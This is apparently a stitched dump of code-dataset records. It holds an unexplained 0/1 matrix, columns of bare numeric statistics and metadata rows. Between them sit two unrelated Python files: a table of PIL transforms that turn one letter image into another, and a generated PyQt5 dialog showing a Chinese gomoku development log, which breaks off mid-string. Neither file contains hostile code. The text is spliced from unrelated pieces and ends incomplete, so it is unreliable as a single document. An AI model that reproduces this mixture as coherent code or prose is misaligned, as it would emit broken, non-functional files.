[0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,1,0,0,0,1,0,0,0,0,1,0,0,1,0,0,1,1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0],
[1,0,1,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0],
[0,1,1,1,0,0,0,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,1,1,0,0,1,0,0,0,0,1,0,0,0,0,1,0],
[0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,0,1,0,0,1,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,1,1,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,1,0,1,0,1,1,0,1,1,1,0,1,0,0,1,0,1,0,1,1,0,0,0,1,1,1,1,0,0,0,1,1,0,0],
[0,1,0,0,0,1,0,0,1,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,0,0,0,0,1,0,0,1,1,1,0,1,0,1,0,0,0,1,0,1,0,1,1,0,0,0,0,1,1,1,1,1,1,0,0,1,1,1,0,1,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,0,0,1,1,0,0,1],
[0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1],
[1,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0],
[1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,1,1,1,1,0,0,0,1,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0],
[1,0,1,1,0,1,0,1,1,0,1,1,0,1,0,0,1,0,0,0,1,1,1,0,0,1,0,1,0,0,1,1,0,0,0,1,0,1,0,1,1,1,1,0,1,0,1,0,0,1,1,0,0,0,1,1,1,0,1,0,0,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,1,0,0,0,0,0,1,0,0,1,0,0,0,1,1,1,1,1,0,1,0,0,1],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0],
[0,1,0,1,0,0,1,1,0,0,1,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,1,1,0,1,0,0,0,0,0],
[1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,1,0],
[0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1],
[0,1,1,0,0,0,1,1,1,0,1,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,1,1,0,0,1,0,1,0,0,1,0,1,1,0,0,0,0,1,0,1,0,1,1,1,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,0,0,0,1,1,0,1,1,0,1,0,0,1,0,0,0,1,0,1],
[0,0,0,0,0,1,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,1,1,1,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,1,0,1,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,1,1,0,1,0,0,0,1,1,0,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,0],
[0,0,1,1,0,0,1,0,0,1,1,1,1,0,0,0,0,0,1,1,0,0,0,0,1,1,0,1,1,0,1,1,1,1,0,0,1,0,0,0,0,0,0,1,1,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,1,1,0,0,0],
[0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0],
[0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0],
[0,1,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,1,0,0,1,0,0,1,0,1,0,1,1,1,0,0,0,0,0,1,1,0,0,0,0,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0]]
| 197.19802
| 200
| 0.492745
| 9,803
| 19,917
| 1.00102
| 0.000408
| 1.235504
| 1.48823
| 1.606848
| 0.998777
| 0.998777
| 0.998777
| 0.998777
| 0.998777
| 0.998268
| 0
| 0.494625
| 0.005121
| 19,917
| 100
| 201
| 199.17
| 0.000606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
10868eb7d53918896badaf01bff96b545e4eeff6
| 2,778
|
py
|
Python
|
mutations.py
|
joshbarrass/IFailedTheClassTest
|
e15ca73ed8fff616a2efff38025fa11ce2770af9
|
[
"MIT"
] | null | null | null |
mutations.py
|
joshbarrass/IFailedTheClassTest
|
e15ca73ed8fff616a2efff38025fa11ce2770af9
|
[
"MIT"
] | null | null | null |
mutations.py
|
joshbarrass/IFailedTheClassTest
|
e15ca73ed8fff616a2efff38025fa11ce2770af9
|
[
"MIT"
] | null | null | null |
from PIL import Image
# MUTATIONS lists ways of mutating a letter into another letter. The
# first key is the target letter, and MUTATIONS[target] will return a
# new dict. The second key is the required
# letter. MUTATIONS[target][required] returns the mutation function
# needed to turn the required letter into the target letter.
# Building blocks for the letter mutations below.  Each helper takes a PIL
# image and returns a transformed copy; composing them covers every
# letter-to-letter transformation the table needs.
def _rot180(im):
    # Half turn (180-degree rotation).
    return im.transpose(Image.ROTATE_180)


def _mirror(im):
    # Horizontal mirror (left-right flip).
    return im.transpose(Image.FLIP_LEFT_RIGHT)


def _rot180_then_mirror(im):
    # Half turn followed by a horizontal mirror.
    return im.transpose(Image.ROTATE_180).transpose(Image.FLIP_LEFT_RIGHT)


def _mirror_then_rot180(im):
    # Horizontal mirror followed by a half turn.
    return im.transpose(Image.FLIP_LEFT_RIGHT).transpose(Image.ROTATE_180)


def _quarter_ccw(im):
    # Quarter turn counter-clockwise, bilinear resampling.
    return im.rotate(90, Image.BILINEAR)


def _quarter_cw(im):
    # Quarter turn clockwise, bilinear resampling.
    return im.rotate(-90, Image.BILINEAR)


# MUTATIONS[target][required] is the function that turns an image of the
# *required* letter into an image of the *target* letter.
MUTATIONS = {
    "d": {
        "P": _rot180,
        "p": _rot180,
        "b": _mirror,
        "q": _rot180_then_mirror,
    },
    "P": {
        "d": _rot180,
        "b": _rot180_then_mirror,
        "q": _mirror,
    },
    "b": {
        "d": _mirror,
        "p": _rot180_then_mirror,
        "P": _rot180_then_mirror,
        "q": _rot180,
    },
    "q": {
        "p": _mirror,
        "P": _mirror,
        "d": _rot180_then_mirror,
        "b": _rot180,
    },
    #
    "U": {
        "C": _quarter_ccw,
        "c": _quarter_ccw,
    },
    "C": {
        "U": _quarter_cw,
        "u": _quarter_cw,
    },
    #
    "M": {
        "w": _rot180,
        "W": _rot180,
    },
    "W": {
        "M": _rot180,
        "m": _rot180,
    },
    "S": {
        "z": _mirror,
        "Z": _mirror,
    },
    "Z": {
        "s": _mirror,
        "S": _mirror,
    },
    #
    "r": {
        "L": _mirror_then_rot180,
    },
    "L": {
        "r": _mirror_then_rot180,
    },
}
| 30.866667
| 69
| 0.552196
| 342
| 2,778
| 4.345029
| 0.154971
| 0.30148
| 0.195155
| 0.31965
| 0.811575
| 0.811575
| 0.810229
| 0.810229
| 0.664872
| 0.514132
| 0
| 0.029121
| 0.307775
| 2,778
| 89
| 70
| 31.213483
| 0.74363
| 0.108351
| 0
| 0.4875
| 0
| 0
| 0.016613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0125
| 0
| 0.0125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
10abf2acdf2fd16fdea10df9a7e462c67a6c019a
| 14,835
|
py
|
Python
|
final/UI_develop.py
|
pickxiguapi/gobang
|
e74d4c89e67342a89e76d12437812a0f570a7ba2
|
[
"MIT"
] | 2
|
2020-05-31T08:42:05.000Z
|
2021-09-27T08:28:16.000Z
|
final/UI_develop.py
|
pickxiguapi/gobang
|
e74d4c89e67342a89e76d12437812a0f570a7ba2
|
[
"MIT"
] | null | null | null |
final/UI_develop.py
|
pickxiguapi/gobang
|
e74d4c89e67342a89e76d12437812a0f570a7ba2
|
[
"MIT"
] | 1
|
2021-09-27T08:28:19.000Z
|
2021-09-27T08:28:19.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'UI_develop.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_develop(object):
def setupUi(self, Dialog):
    """Build the static widget layout for the development-log dialog.

    Generated by the PyQt5 UI code generator (see the file header);
    manual edits here are lost if the .ui file is recompiled.
    """
    Dialog.setObjectName("Dialog")
    Dialog.resize(700, 530)
    # Title label, centered near the top of the dialog.
    self.label = QtWidgets.QLabel(Dialog)
    self.label.setGeometry(QtCore.QRect(225, 10, 250, 50))
    font = QtGui.QFont()
    font.setFamily("微软雅黑")  # font family "Microsoft YaHei"
    font.setPointSize(20)
    font.setBold(True)
    font.setWeight(75)
    self.label.setFont(font)
    self.label.setAlignment(QtCore.Qt.AlignCenter)
    self.label.setObjectName("label")
    # Read-only text area that holds the changelog body.
    self.textBrowser = QtWidgets.QTextBrowser(Dialog)
    self.textBrowser.setGeometry(QtCore.QRect(0, 70, 700, 461))
    # Fresh QFont: same family, smaller size for the body text.
    font = QtGui.QFont()
    font.setFamily("微软雅黑")
    font.setPointSize(12)
    font.setBold(True)
    font.setWeight(75)
    self.textBrowser.setFont(font)
    self.textBrowser.setObjectName("textBrowser")
    self.retranslateUi(Dialog)
    QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "开发日志"))
self.label.setText(_translate("Dialog", "开 发 日 志"))
self.textBrowser.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'微软雅黑\'; font-size:12pt; font-weight:600; font-style:normal;\">\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年6月26日 Ver1.0.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">完成了判断胜负,落子等基础功能,使用Tkinter完成了基础图形界面,现在可以在一台电脑上通过鼠标点击实现自己和自己对战了。 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年6月27日 Ver1.1.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">解决了边角棋子显示不完全的BUG </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">添加了开始游戏按钮,修改了图形界面响应逻辑 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年6月29日 Ver1.2.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">使用Q-learning写了第一版五子棋AI,效果不佳 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">改变了棋盘界面颜色,现在界面更加清爽了 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">2019年6月30日 Ver1.4.0<span style=\" font-weight:400;\"> </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">改变了五子棋AI的算法,使用alpha-beta剪枝博弈树搜索算法完成第二版五子棋AI。 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">已知BUG:1、玩家对相同位置重复落子被判定为有效 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2、由于程序使用单线程,AI在计算落子位置时界面会未响应 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年7月1日 Ver1.5.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">解决了重复落子判定问题,优化了五子棋AI在部分棋型情况下的计算速度。 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">2019年7月2日 Ver1.6.0<span style=\" font-weight:400;\"> </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">增加了局域网对战功能,玩家可以选择建立房间和加入房间,房主默认为黑色棋子且先手 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">已知BUG:由于程序是单线程的,所以在对方回合时会造成棋盘未响应,回到我方回合时即恢复正常 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年7月3日 Ver1.7.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">修复了双人对战功能无法正常进行胜负判定功能的BUG </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">修复了双人对战功能没有开始游戏就能下子的BUG </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年7月4日 Ver1.8.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">双人对战功能现在可以由房主选择黑/白方和先/后手了,另一方将随房主设置自动应用 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">2019年7月5日 Ver2.0.0 </p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">使用pyQT制作了初始界面和功能选择(人机/人人)界面,现在游戏的可交互性更强了 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">现在人机AI根据搜索深度被分为简单,一般,困难三个难度级别了,可以自由选择挑战 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">已知问题:困难级别AI的计算时间过长,仍然需要优化,在10步棋之后的响应时间达到了2分钟 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年7月6日 Ver2.1.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">为人机对战模式增加了悔棋、禁手(详细规则见后)、重新开始、退出游戏等功能按钮 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">为人和不同难度的AI制作了不同的头像,按钮制作为配套风格 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年7月7日 Ver2.2.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">在人机对战模式中增加了哪方下子的提示信息 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">增加了落子信息提示框,妈妈再也不用担心我找不到上一步落子位置了! </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">由于局域网对战模式涉及到数据传递问题较难解决,目前增加的功能性按钮均只应用于人机模式 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\"> </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; color:#000000;\">附1 禁手规则:该规则开启后对黑方有效</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">1.三、三禁手</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">黑方一子落下同时形成两个或两个以上的活三(或嵌四),此步为三三禁手。</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">2.四、四禁手</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">黑方一子落下同时形成两个或两个以上的四,活四、冲四、嵌五之四,包括在此四之内。此步为四四禁手。注意:只要是两个“四”即为禁手,无论是哪种四,活四,跳四,冲四都算。</span></p>\n"
